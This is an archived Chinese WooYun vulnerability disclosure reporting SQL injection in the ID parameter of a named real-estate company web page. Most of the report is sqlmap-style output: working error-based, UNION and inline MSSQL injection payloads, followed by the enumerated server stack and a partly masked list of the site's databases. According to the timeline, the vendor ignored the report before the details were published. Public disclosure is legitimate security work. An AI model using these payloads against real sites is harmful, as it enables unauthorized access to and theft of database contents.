乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-20: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-10-04: 厂商已经主动忽略漏洞,细节向公众公开
好霸气的名字。
http://gy.evergrande.com/ObjectHouseInfo.aspx?ID=13参数id存在SQL注射漏洞
Place: GETParameter: ID Type: error-based Title: Microsoft SQL Server/Sybase error-based - Parameter replace Payload: ID=(CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(113)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (9466=9466) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(98)+CHAR(118)+CHAR(113)))) Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: ID=13 UNION ALL SELECT CHAR(113)+CHAR(115)+CHAR(113)+CHAR(114)+CHAR(113)+CHAR(79)+CHAR(71)+CHAR(119)+CHAR(69)+CHAR(115)+CHAR(76)+CHAR(67)+CHAR(105)+CHAR(69)+CHAR(102)+CHAR(113)+CHAR(100)+CHAR(98)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: ID=(SELECT CHAR(113)+CHAR(115)+CHAR(113)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (6788=6788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(98)+CHAR(118)+CHAR(113))---web server operating system: Windowsweb application technology: ASP.NET, ASP.NET 0back-end DBMS: Microsoft SQL Server 2005available databases [9]:[*] *hengda[*] hengda2**[*] mast**[*] mod**[*] msdb[*] ReportServer$***[*] ReportServer$***TempDB[*] temp**[*] tianmaidi**
~过滤
未能联系到厂商或者厂商积极拒绝